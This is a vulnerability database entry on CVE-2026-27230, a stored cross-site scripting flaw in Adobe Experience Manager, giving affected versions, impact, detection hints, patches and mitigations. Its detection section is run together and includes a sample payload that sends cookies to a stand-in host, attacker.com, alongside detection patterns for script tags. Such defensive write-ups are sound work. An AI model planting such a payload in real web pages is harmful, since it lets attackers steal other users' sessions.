
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27230 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged authenticated attacker to inject malicious scripts into vulnerable form fields. Affected versions include AEM 6.5.23 and earlier (on-premises) and AEM Cloud Service versions prior to 2026.2.0. Adobe disclosed and patched this vulnerability on March 10–11, 2026, as part of security bulletin APSB26-24. It carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. A low-privileged attacker can inject malicious JavaScript into form fields within AEM; the payload is stored server-side and subsequently executed in the browsers of other users who visit the page containing the vulnerable field. Exploitation requires network access, low privileges, and user interaction (a victim browsing to the affected page), with a changed scope indicating cross-context impact (Adobe Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, enabling session token theft, credential harvesting, redirection to phishing sites, or performing unauthorized actions on behalf of the victim. The changed scope means the impact extends beyond the attacker's own session to affect other authenticated users, including potentially administrators. Confidentiality and integrity are both assessed as low impact, with no direct availability impact (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.%3Cscript%3E, <script>) or JavaScript event handlers in form field parameters.<script> tags or JavaScript URIs (e.g., javascript:) stored within AEM JCR (Java Content Repository) nodes, particularly in text or rich-text fields.Adobe has released patches addressing this vulnerability: upgrade AEM on-premises deployments to version 6.5.24.0 or later, and AEM Cloud Service to version 2026.2.0 or later (Adobe Advisory). As interim mitigations, administrators should implement Content Security Policy (CSP) headers to restrict unauthorized script execution, and restrict form field modification privileges to trusted administrators only. A security review of deployed AEM instances is recommended to identify and remove any previously injected malicious content in form fields.
The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the same March 2026 release cycle. No significant independent researcher commentary or notable social media discussion specific to CVE-2026-27230 has been identified, consistent with its medium severity rating and lack of public exploit code.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."